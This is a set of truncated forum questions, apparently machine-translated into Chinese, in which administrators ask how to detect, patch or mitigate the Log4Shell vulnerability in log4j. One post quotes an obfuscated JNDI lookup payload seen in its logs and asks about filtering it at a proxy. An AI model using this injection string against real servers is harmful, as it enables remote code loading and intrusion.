我有一个使用 log4j 进行日志记录的 Java 应用程序。一切都很好,直到 log4Shell 出现问题,我被迫升级到 2.17.1。 我的应用程序使用基于启动、时间和大小的滚动策略。通常它每天会生成大约 6 个日志文件。但有些时候事情变得非常疯狂(我最需要这些日志文件),文件数量可能一天超过 100 个。程序不断崩溃,看门狗不断将其唤醒。 之前运行的版本除了 log4j 版本之外没有任何变化,在固定数字(可能是 100)之后开始覆盖最后一个日志文件。我开始在文件名中使用 %04i,因此我得到了可读性良好的循环数字。我当前的配置不再丢弃最后一个文件,但发...
目前,我还没有在 MS 网站上找到任何有关 2012r2 log4j 检测的有用信息。看来 Windows Defender 应该可以检测问题,但 2012r2 并未得到适当支持。有人推荐任何快速检查工具吗? ...
我正在尝试评估一些软件工具(ERD 图),并下载了 dbSchema 和 ModelXtractor。尝试安装任一工具都会导致 Windows Defender 弹出窗口: dbSchema 提供了三个不同的包,一个自解压的 .exe、一个 .msi 和一个 .zip 文件。前两个文件在尝试启动时会发出警告。.zip 文件可以解压,但尝试运行应用程序可执行文件也会发出警告。 供应商在其网站上提供了 md5 校验和,并且所有三个文件(.exe、.msi 和 .zip)都匹配。 Windows Defender 是否会对 log4j 的易受攻击的版本发出警报?...
我不是 IT 或 Apache 专家,但我使用 Linux 多年。我已尽最大努力强化/保护我的在线服务器,该服务器用于需要提供其内容等的移动应用程序。 我注意到今天有人试图使用wget和攻击我的 Apache 2.4.57 服务器(显然?) log4j。我没有tomcat,只是简单地httpd运行php。 这是一条日志条目。(我已将日志条目中的 IP 地址信息更改为 XXXX。还请注意状态 200 返回代码,这意味着它成功了: [Sat Apr 08 16:08:57.428096 2023] [http:trace3] [pid 15227:tid 1...
我的漏洞扫描程序最近在我们最近部署的 MS SQL 版本 (SQL 2019) 中标记了 Apache Log4j 不受支持的安装。这导致了两个我必须解决的高优先级发现。具体来说,似乎与文件 log4j-1.2.17.jar 有关。 显然,这里有一个 2.17.1 版本可用: https://logging.apache.org/log4j/2.x/download.html 不幸的是,我不知道如何使用它。没有安装程序,只有一堆文件。同一个网站上有一部分文章似乎是针对开发人员如何使用 Apache2(这似乎就是这个文件集合的实际用途),但我不是开发人员,只...
所以我最近收到一封邮件,要求将安装在我服务器上的 Apache 软件更新到最新的安全更新(与 Apache Log4j 相关的漏洞 (CVE-2021-44228 和 CVE-2021-45046)),但是我如何才能检测出这个log4j在哪里使用呢? 当我运行 cmd: 时java --version我得到: 然后我找到了一个 github log4j 脚本检查器:./wget.exe https://raw.githubusercontent.com/rubo77/log4j_checker_beta/main/lo ...
我安装了支持 log4j2 的 Kafka 3.0 预览版(http://home.apache.org/~dongjin/post/apache-kafka-log4j2-support/) 在 RHEL 8 服务器上。Kafka 和 Zookeeper 作为 systemd 用户服务成功运行。我KAFKA_LOG4J_OPTS="-Dlog4j.configurationFile=file:/home/username/kafka/bin/../config/log4j2.properties"在 systemd 单元文件中设置了环境变量,以便使用 lo...
我找不到任何有关特定 JRE 版本是否受到影响的信息?我的 Windows Server 2012 上的应用程序使用 JRE 1.8.0.x (1.8.0_91),但不确定它是否使用 Log4j 日志服务。有人能帮忙澄清一下吗,因为奇怪的是,我找不到任何人解释这一点。非常感谢!! ...
我有一台 Windows Server 2012 R2 机器。搜索 log4j 的最佳方法是什么。简单的文件搜索就足够了吗?或者这些文件是否可以在容器内部使用。我在 power shell 中进行了这样的文件搜索 Get-childitem -Path c:\ -Include log4j*.jar -File -Recurse -ErrorAction SilentlyContinue | select Lastwritetime, directory, name | export-csv -append -notypeinformation c.csv ...
我在 Linux 上运行 PowerDNS。看来 PowerDNS 容易受到新的 log4j 漏洞攻击。有什么方法可以禁用 Log4j 吗?根据我的研究,似乎可以将日志记录方法更改为 syslog,但我不太清楚如何做到这一点。 ...
是否存在可能受此影响的软件列表?Apache Log4jshell脆弱性(CVE-2021-44228) 是上周五宣布的吗? 对于管理多台服务器并运行大量不同软件的人来说,最好有一个可能受影响的软件列表。不需要包含版本的详细信息,只要包含受影响版本的任何内容,甚至包含受影响版本的任何内容即可可能被影响。 首先列出清单: 阿帕奇Solr 阿帕奇 Tomcat Apache Struts Apache Druid Apache Flink 阿帕奇·斯威夫特 Elasticsearch ...
试图了解更多关于最近发现的0 日漏洞 这是我发现的受影响软件的列表 ->https://github.com/NCSC-NL/log4shell/tree/main/software 仅在 F5 的注释中提到了 nginx。 如果我使用带有 nginx 的 Ubuntu 服务器通过互联网提供文件服务,我需要担心吗? ...
我读过有关 Log4j 的安全漏洞。 如何检查我的服务器上是否安装了 Log4j?我的具体服务器使用Ubuntu 18.04.6 LTS。 我已经安装了许多第三方软件包,其中可能有一些包含它。 是否有一个命令可以在我的服务器上运行来检查 Log4j 是否已安装? ...
我正在使用香港反向代理代理我的 Web 服务器的每个 HTTP 请求。我想缓解当前的 log4j 问题 ("log4shell通过查找并替换关键攻击者的字符串(如“jndi”),我能够轻松找到问题根源。例如,我在日志中发现了以下内容: ${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback} 我认为这可以通过使用请求转换器插件。有人已经这样做了吗? PS:仅仅jndi用 来替换disabled太过深远而且会破坏很多东西。 ...
我目前使用 Java 中的 log4j 库将日志发布到 syslog,但这些日志始终显示主机名“localhost”,而不是设备的实际名称。只有当我从 Java 程序发送日志时才会发生这种情况。如果我使用 logger 将日志发送到 syslog,它们会显示正确的 FQDN。这是我的模板: $template myFormat, "%TIMESTAMP:::date-rfc3339% %HOSTNAME% %msg%\n" $ActionFileDefaultTemplate myFormat 我也使用过$PreserveFQDN on并尝试过将模板中...